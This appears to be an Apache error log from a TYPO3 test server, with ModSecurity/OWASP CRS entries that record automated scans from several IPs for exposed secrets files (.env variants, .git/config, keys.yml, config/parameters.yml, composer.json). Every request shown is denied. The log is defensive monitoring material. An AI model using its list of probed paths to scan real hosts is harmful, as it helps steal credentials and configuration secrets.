[Mon May 26 22:43:20.637798 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/composer.json, referer: http://surf.test.indacotrentino.com/composer.json
[Mon May 26 22:43:20.964969 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/composer.json, referer: http://surf.test.indacotrentino.com/composer.json
[Mon May 26 22:43:21.394304 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "/package.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /package.json found within REQUEST_FILENAME: /package.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "aDTSaVNfyYOYBczX3ejNQAAAAAo"], referer: http://surf.test.indacotrentino.com/package.json
[Mon May 26 22:43:21.394601 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "aDTSaVNfyYOYBczX3ejNQAAAAAo"], referer: http://surf.test.indacotrentino.com/package.json
[Mon May 26 22:43:21.395235 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "aDTSaVNfyYOYBczX3ejNQAAAAAo"], referer: http://surf.test.indacotrentino.com/package.json
[Mon May 26 22:43:22.209519 2025] [:error] [pid 3420045] [client 165.1.71.166:36170] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "/package.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /package.json found within REQUEST_FILENAME: /package.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "aDTSatULCrIjo3SXkWn28wAAAAk"], referer: http://surf.test.indacotrentino.com/package.json
[Mon May 26 22:43:22.209820 2025] [:error] [pid 3420045] [client 165.1.71.166:36170] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "aDTSatULCrIjo3SXkWn28wAAAAk"], referer: http://surf.test.indacotrentino.com/package.json
[Mon May 26 22:43:22.209986 2025] [:error] [pid 3420045] [client 165.1.71.166:36170] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "aDTSatULCrIjo3SXkWn28wAAAAk"], referer: http://surf.test.indacotrentino.com/package.json
[Mon May 26 22:43:22.632264 2025] [authz_core:error] [pid 3420045] [client 165.1.71.166:36170] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.travis.yml, referer: http://surf.test.indacotrentino.com/.travis.yml
[Mon May 26 22:43:22.954392 2025] [authz_core:error] [pid 3420045] [client 165.1.71.166:36170] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.travis.yml, referer: http://surf.test.indacotrentino.com/.travis.yml
[Mon May 26 22:43:23.379938 2025] [authz_core:error] [pid 3420045] [client 165.1.71.166:36170] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.circleci, referer: http://surf.test.indacotrentino.com/.circleci/configs/development.yml
[Mon May 26 22:43:23.702683 2025] [authz_core:error] [pid 3420045] [client 165.1.71.166:36170] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.circleci, referer: http://surf.test.indacotrentino.com/.circleci/configs/development.yml
[Mon May 26 22:43:24.127173 2025] [authz_core:error] [pid 3420045] [client 165.1.71.166:36170] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app, referer: http://surf.test.indacotrentino.com/app/config/parameters.yml
[Mon May 26 22:43:24.449889 2025] [authz_core:error] [pid 3420045] [client 165.1.71.166:36170] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app, referer: http://surf.test.indacotrentino.com/app/config/parameters.yml
[Mon May 26 22:43:24.874109 2025] [authz_core:error] [pid 3420045] [client 165.1.71.166:36170] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config, referer: http://surf.test.indacotrentino.com/config/parameters.yml
[Mon May 26 22:43:25.196362 2025] [authz_core:error] [pid 3420045] [client 165.1.71.166:36170] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config, referer: http://surf.test.indacotrentino.com/config/parameters.yml
[Mon May 26 22:43:25.619648 2025] [authz_core:error] [pid 3420045] [client 165.1.71.166:36170] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config, referer: http://surf.test.indacotrentino.com/config/local.yml
[Mon May 26 22:43:25.942416 2025] [authz_core:error] [pid 3420045] [client 165.1.71.166:36170] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config, referer: http://surf.test.indacotrentino.com/config/local.yml
[Mon May 26 22:43:26.366935 2025] [authz_core:error] [pid 3420045] [client 165.1.71.166:36170] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config, referer: http://surf.test.indacotrentino.com/config/application.yml
[Mon May 26 22:43:26.689056 2025] [authz_core:error] [pid 3420045] [client 165.1.71.166:36170] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config, referer: http://surf.test.indacotrentino.com/config/application.yml
[Mon May 26 22:43:27.904407 2025] [authz_core:error] [pid 3420045] [client 165.1.71.166:36170] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config, referer: http://surf.test.indacotrentino.com/config/settings.yml
[Mon May 26 22:43:28.228175 2025] [authz_core:error] [pid 3420045] [client 165.1.71.166:36170] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config, referer: http://surf.test.indacotrentino.com/config/settings.yml
[Mon May 26 22:43:30.998326 2025] [authz_core:error] [pid 3420045] [client 165.1.71.166:36170] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/keys.yml, referer: http://surf.test.indacotrentino.com/keys.yml
[Mon May 26 22:43:31.320719 2025] [authz_core:error] [pid 3420045] [client 165.1.71.166:36170] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/keys.yml, referer: http://surf.test.indacotrentino.com/keys.yml
[Mon May 26 22:43:51.342918 2025] [authz_core:error] [pid 3420045] [client 165.1.71.166:36170] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/swagger.yaml, referer: http://surf.test.indacotrentino.com/swagger.yaml
[Mon May 26 22:43:51.665423 2025] [authz_core:error] [pid 3420045] [client 165.1.71.166:36170] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/swagger.yaml, referer: http://surf.test.indacotrentino.com/swagger.yaml
[Mon May 26 22:43:52.089929 2025] [authz_core:error] [pid 3420045] [client 165.1.71.166:36170] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/swagger.yml, referer: http://surf.test.indacotrentino.com/swagger.yml
[Mon May 26 22:43:52.412978 2025] [authz_core:error] [pid 3420045] [client 165.1.71.166:36170] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/swagger.yml, referer: http://surf.test.indacotrentino.com/swagger.yml
[Mon May 26 22:43:53.621899 2025] [authz_core:error] [pid 3420045] [client 165.1.71.166:36170] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api, referer: http://surf.test.indacotrentino.com/api/swagger.yaml
[Mon May 26 22:43:53.944583 2025] [authz_core:error] [pid 3420045] [client 165.1.71.166:36170] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api, referer: http://surf.test.indacotrentino.com/api/swagger.yaml
[Mon May 26 22:43:54.368429 2025] [authz_core:error] [pid 3420045] [client 165.1.71.166:36170] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api, referer: http://surf.test.indacotrentino.com/api/swagger.yml
[Mon May 26 22:43:54.690865 2025] [authz_core:error] [pid 3420045] [client 165.1.71.166:36170] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api, referer: http://surf.test.indacotrentino.com/api/swagger.yml
[Mon May 26 22:44:09.902073 2025] [:error] [pid 3426516] [client 165.1.71.166:56412] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "/webpack.config.js" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /webpack.config.js found within REQUEST_FILENAME: /webpack.config.js"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/webpack.config.js"] [unique_id "aDTSmXmx9h0t05Mfdo-kzAAAAAQ"], referer: http://surf.test.indacotrentino.com/webpack.config.js
[Mon May 26 22:44:09.902379 2025] [:error] [pid 3426516] [client 165.1.71.166:56412] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/webpack.config.js"] [unique_id "aDTSmXmx9h0t05Mfdo-kzAAAAAQ"], referer: http://surf.test.indacotrentino.com/webpack.config.js
[Mon May 26 22:44:09.902578 2025] [:error] [pid 3426516] [client 165.1.71.166:56412] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/webpack.config.js"] [unique_id "aDTSmXmx9h0t05Mfdo-kzAAAAAQ"], referer: http://surf.test.indacotrentino.com/webpack.config.js
[Mon May 26 22:44:10.227960 2025] [:error] [pid 3426516] [client 165.1.71.166:56412] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "/webpack.config.js" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /webpack.config.js found within REQUEST_FILENAME: /webpack.config.js"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/webpack.config.js"] [unique_id "aDTSmnmx9h0t05Mfdo-kzQAAAAQ"], referer: http://surf.test.indacotrentino.com/webpack.config.js
[Mon May 26 22:44:10.228252 2025] [:error] [pid 3426516] [client 165.1.71.166:56412] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/webpack.config.js"] [unique_id "aDTSmnmx9h0t05Mfdo-kzQAAAAQ"], referer: http://surf.test.indacotrentino.com/webpack.config.js
[Mon May 26 22:44:10.228439 2025] [:error] [pid 3426516] [client 165.1.71.166:56412] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/webpack.config.js"] [unique_id "aDTSmnmx9h0t05Mfdo-kzQAAAAQ"], referer: http://surf.test.indacotrentino.com/webpack.config.js
[Mon May 26 22:44:13.812838 2025] [authz_core:error] [pid 3426516] [client 165.1.71.166:56412] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git, referer: http://surf.test.indacotrentino.com/.git/config
[Mon May 26 22:44:14.138420 2025] [authz_core:error] [pid 3426516] [client 165.1.71.166:56412] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git, referer: http://surf.test.indacotrentino.com/.git/config
[Mon May 26 22:44:14.565024 2025] [authz_core:error] [pid 3426516] [client 165.1.71.166:56412] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.gitconfig, referer: http://surf.test.indacotrentino.com/.gitconfig
[Mon May 26 22:44:14.890937 2025] [authz_core:error] [pid 3426516] [client 165.1.71.166:56412] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.gitconfig, referer: http://surf.test.indacotrentino.com/.gitconfig
[Tue May 27 04:52:01.444700 2025] [authz_core:error] [pid 3435311] [client 45.144.212.129:47460] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue May 27 15:49:47.550417 2025] [authz_core:error] [pid 3435317] [client 45.148.10.80:35704] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue May 27 16:14:35.609030 2025] [authz_core:error] [pid 3446688] [client 93.123.109.7:36224] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu May 29 05:21:29.960671 2025] [authz_core:error] [pid 3487171] [client 45.148.10.80:57316] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri May 30 17:12:39.225983 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aDnK56fe6YUdhe6un0PPtAAAAAE"], referer: http://surf.test.indacotrentino.com/.env
[Fri May 30 17:12:39.227702 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aDnK56fe6YUdhe6un0PPtAAAAAE"], referer: http://surf.test.indacotrentino.com/.env
[Fri May 30 17:12:39.227905 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aDnK56fe6YUdhe6un0PPtAAAAAE"], referer: http://surf.test.indacotrentino.com/.env
[Fri May 30 17:12:39.544751 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aDnK56fe6YUdhe6un0PPtQAAAAE"], referer: http://surf.test.indacotrentino.com/.env
[Fri May 30 17:12:39.545048 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aDnK56fe6YUdhe6un0PPtQAAAAE"], referer: http://surf.test.indacotrentino.com/.env
[Fri May 30 17:12:39.545240 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aDnK56fe6YUdhe6un0PPtQAAAAE"], referer: http://surf.test.indacotrentino.com/.env
[Fri May 30 17:12:39.963471 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.dist, referer: http://surf.test.indacotrentino.com/.env.dist
[Fri May 30 17:12:40.280260 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.dist, referer: http://surf.test.indacotrentino.com/.env.dist
[Fri May 30 17:12:40.698128 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak, referer: http://surf.test.indacotrentino.com/.env.bak
[Fri May 30 17:12:41.014918 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak, referer: http://surf.test.indacotrentino.com/.env.bak
[Fri May 30 17:12:41.433356 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "aDnK6afe6YUdhe6un0PPugAAAAE"], referer: http://surf.test.indacotrentino.com/.env.dev.local
[Fri May 30 17:12:41.433632 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "aDnK6afe6YUdhe6un0PPugAAAAE"], referer: http://surf.test.indacotrentino.com/.env.dev.local
[Fri May 30 17:12:41.433836 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "aDnK6afe6YUdhe6un0PPugAAAAE"], referer: http://surf.test.indacotrentino.com/.env.dev.local
[Fri May 30 17:12:41.750577 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "aDnK6afe6YUdhe6un0PPuwAAAAE"], referer: http://surf.test.indacotrentino.com/.env.dev.local
[Fri May 30 17:12:41.750858 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "aDnK6afe6YUdhe6un0PPuwAAAAE"], referer: http://surf.test.indacotrentino.com/.env.dev.local
[Fri May 30 17:12:41.751061 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "aDnK6afe6YUdhe6un0PPuwAAAAE"], referer: http://surf.test.indacotrentino.com/.env.dev.local
[Fri May 30 17:12:42.170710 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "aDnK6qfe6YUdhe6un0PPvAAAAAE"], referer: http://surf.test.indacotrentino.com/.env.development.local
[Fri May 30 17:12:42.171108 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "aDnK6qfe6YUdhe6un0PPvAAAAAE"], referer: http://surf.test.indacotrentino.com/.env.development.local
[Fri May 30 17:12:42.171367 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "aDnK6qfe6YUdhe6un0PPvAAAAAE"], referer: http://surf.test.indacotrentino.com/.env.development.local
